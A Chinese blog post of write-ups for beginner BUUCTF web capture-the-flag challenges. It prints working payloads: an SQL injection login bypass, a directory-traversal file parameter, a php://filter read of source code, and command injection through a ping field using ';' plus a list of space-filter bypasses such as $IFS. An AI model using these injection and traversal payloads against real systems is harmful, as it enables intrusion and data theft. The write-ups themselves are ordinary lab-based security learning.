buuctf web 习题解析(1)

最新推荐文章于 2023-09-07 20:52:18 发布
最新推荐文章于 2023-09-07 20:52:18 发布
阅读量90 收藏
点赞数 1
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75456435/article/details/130839447
版权

[极客大挑战 2019]EasySQL1

进入题目后,首先使用弱口令admin判断

 发现不是弱口令,再尝试使用万能密码

1'or 1=1#

 即可得到flag

 

 [极客大挑战 2019]Havefun

 进入源码查看

发现注释掉的内容

根据提示,令

?cat=dog

即可得到flag

 

 [HCTF 2018]WarmUp

老样子,先看源码

发现注释掉一个php

 访问那个php

得到并分析php代码 

?file=hint.php

得到

 

我们可以得到ffffllllaaaagggg肯定不在当前目录,一般情况下,在上四级或五级目录

那么就可以构造payload,

?file=hint.php?../../../../../ffffllllaaaagggg

得出flag

 [ACTF2020 新生赛]Include

 

 

源码没什么特别的,试试抓个包

 抓包之后也没有什么特别的

那再试试伪协议

?file=php://filter/convert.base64-encode/resource=flag.php

得到一串base64编码

解码,即可得到flag

 

[ACTF2020 新生赛]Exec

 首先ping一个随即地址试试

接下来就要看看他哪些被过滤掉,哪些没有过滤掉 

试试ls能不能出目录

发现出来了一个index.php

然后得出;没被过滤,接下来遍历目录

 看到flag文件,cat flag,就能得到flag

 [GXYCTF2019]Ping Ping Ping

根据题目提示,这道题还是ping的题

 

ping一下ls 

 当我们cat flag.php发现

发现有过滤

猜测是cat

可替换cat的有

more:一页一页的显示档案内容

less:与 more 类似

head:查看头几行 t

ac:从最后一行开始显示,可以看出 tac 是cat 的反向显示

tail:查看尾几行

nl:显示的时候,顺便输出行号

od:以二进制的方式读取档案内容

vi:一种编辑器,这个也可以查看

vim:一种编辑器,这个也可以查看

sort:可以查看

uniq:可以查看file -f:报错出具体内容 grep 

 修改后

 

还是被过滤,可以确定空格被过滤了

${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS

<> 
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20   (space)
%09   (tab)
X=$'cat\x09./flag.php';$X       (\x09表示tab,也可以用\x20)
 

替换后得到

 访问不成,那就不访问flag了,先看看index里过滤了什么吧

 通过看源码,我们可以得到

用替换法去做

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

 

查看源码就得到flag

 

 

伸手不打笑脸
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
数据库练习题及答案解析.docx
12-14
数据库练习题及答案解析 本文档提供了数据库练习题及答案解析,涵盖了数据库系统的基本概念、关系模型、关系代数、数据库完整性规则等方面的知识点。 一、数据库系统的基本概念 * 数据库(DB)、数据库系统(DBS...
WEB开发习题(20211215114922).pdf
11-17
WEB开发习题(20211215114922).pdf
buuctf web 前5题
m0_61903191的博客
09-07 675
sql注入万能密码:admin ' or 1=1 #GET请求通过URL请求参数,可以在URL后面添加参数,以“?”作为分隔符,参数之间用“&”符号链接。简单php代码。php伪协议,获取网页源码,用于获取简单的被注释掉的重要信息伪协议构造格式中的一种:ping命令后可跟管道符,管道符的用法。
buuctf misc web和ctfhub技能树
weixin_74228275的博客
07-01 110
将图片binwalk一下,可得到另一个文件,发现好像解不出来打开stegsolve,save bin一下,保存为zip格式,打开,发现flag。
Web学习之路(BUUCTF刷题之旅3)
AKAXPD的博客
01-24 1885
一、[GXYCTF2019]Ping Ping Ping 二、[极客挑战 2019]Knife 进入目标靶机里,非常简洁明了,只有一个以GET方式传参的提示,那我们随便传一个ip。 /?ip=1;ls看一下都有什么。发现了"flag.php"文件,flag应该就在这里。 /?ip=1;cat flag.php 发现行不通,应该是空格被过滤掉了,要想办法绕过。 这里我使用$IFS$1绕过空格。 但由于我不知道他到底过滤了多少东西,这里我决定先看"index.php"文件。 和
BUUCTF__web题解合集(七)
风过江南乱的博客
08-17 939
1、[网鼎杯 2020 朱雀组]Nmap 2、 [网鼎杯 2020 朱雀组]phpweb 3、[BSidesCF 2020]Had a bad day 4、[BJDCTF2020]EasySearch 5、[WUSTCTF2020]朴实无华
BUUCTF--[BSidesCF 2019]SVGMagic
qq_46263951的博客
07-22 1074
进去后是一个这样的页面 这里大标题给出提示使用 Magic 将 SVG 转换为 PNG 那啥是SVG呢,先来了解一下 这里SVG是个XML的图片,并且存在可控的内容 这里可以尝试一下XEE漏洞的这种情况 由于不知道flag的路径,所以先用/proc/self/pwd/代表的是当前路径。可以构造/proc/self/pwd/flag.txt读取文件. 最终构造.svg文件内容为 <?xml version="1.0" encoding="UTF-8"?> <!D..
Simulink仿真练习-习题+解析
最新发布
05-30
Simulink仿真练习-习题+解析Simulink仿真练习-习题+解析 Simulink仿真练习-习题+解析Simulink仿真练习-习题+解析 Simulink仿真练习-习题+解析Simulink仿真练习-习题+解析 Simulink仿真练习-习题+解析Simulink仿真...
大学物理习题答案解析.pdf
05-25
在提供的文件内容中,我们可以看到一系列大学物理的习题解答与解析。下面将详细地解释各个部分所涉及的知识点: ### 力学部分 #### 运动学 1. **质点运动学分析** - 题目描述了一个质点沿着抛物线 `y = x^2` ...
数据结构习题解析-第二版殷人昆
04-16
《数据结构习题解析-第二版殷人昆》是一本专为学习数据结构而设计的习题解答手册,由殷人昆编著,是清华大学出版社2011年出版的重要教材辅助资料。这本书针对C++语言实现的数据结构进行了深入浅出的讲解,旨在帮助...
BUUCTF__web题解合集(四)
风过江南乱的博客
08-07 1372
一、[GXYCTF2019]禁止套娃 二、[安洵杯 2019]easy_web 三、[GKCTF2020]cve版签到 四、[SWPU2019]Web1 五、[ASIS 2019]Unicorn shop
Buuctf部分题解
weixin_53549425的博客
09-18 2006
这里写目录标题[极客挑战 2019]Http1[极客挑战 2019]Knife1[极客挑战 2019]Upload1buuctf_phpBuuctf__[SUCTF 2019]CheckIn 1 [极客挑战 2019]Http1 老规矩,查看源代码 <!-- Two --> <section id="two" class="wrapper alt style2">
[HCTF 2018]WarmUp1解题思路
旺仔Sec&blog
11-04 635
[HCTF 2018]WarmUp1目录穿越,代码审计解题思路
web练习
victoriesuuo的博客
05-22 290
warm up 查看页面源代码,发现有source.php,打开这个文件看看。 发现还有一个hint.php的文件打开看看。 由于我们不知道它的目录,所以用../返回(5次),打开ffffllllaaaagggg文件. source.php?file=hint.php?../../../../../ffffllllaaaagggg 得到flag. have fun 查看源代码,发现一段特殊代码。 用get的方式活得flag。 include 因为文件..
BUUCTF web入门题目每日两道(一)
horiozn1709的博客
02-03 1212
[极客挑战 2019]EasySQL 1 该题目需要同时输入用户名和密码,在用户名处输入万能密码‘or 1=1 # ,密码处输入任意字符即可得到flag [HCTF 2018]WarmUp 1 php 代码审计问题 首先看页面源码 注意到在body中注释掉了 source.php ,所以我们直接访问source.php 得到源码: <?php highlight_file(__FILE__); classemmm { pu...
[HCTF 2018]WarmUp1
m0_63150097的博客
03-07 2883
提示代码审计,所以先看一下源码。 发现提示source.php,访问一下。 一入眼就看到checkFile函数,以及source.php和hint.php。访问一下hint.php。 提示flag在ffffllllaaaagggg文件中。 解题思路: 这个cehckFile这个函数进行了3次白名单检测、 2次问好过滤、一次URL解码。 class emmm { public static function checkFile(&$page) .
CTF之warmup-文件包含
wcwdnmdnmd的博客
12-24 1140
CTF练习之warmup-文件包含初见 初见 打开以后就见到这样的页面直接F12看源代码 看到<!--source.php-->直接访问 看到白名单有两个地址,访问另一个hint.php 看到ffffllllaaaagggg 再分析source.php的代码 发现$_page处mb_strops($page . '?', '?')有点奇怪,查看函数定义。 发现该函数可被利用 https://www.cnblogs.com/leixiao-/p/10265150.html 知道该函
文件包含漏洞
qq_51301115的博客
05-24 108
敏感函数 require() require_once() include() include_once() warmup 源码中有?截断 payload:source.php?file=hint.php?../../../../../../ffffllllaaaagggg data伪协议 当php等字符被过滤时 标准姿势 data://text/plain;base64,xxxx xxxx是类似<?php system("ls");?>形式代码的base64编码 <?php eva
BUUCTF学习笔记-WarmUp
weixin_42271850的博客
03-04 924
BUUCTF-WarmUp 时间:2020/03/04 考点:代码审计         先看看题目的描述,写着PHP和代码审计,估计是那种直接给一段PHP源代码,然后构造请求来获得flag。         打开题目链接只有一...
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值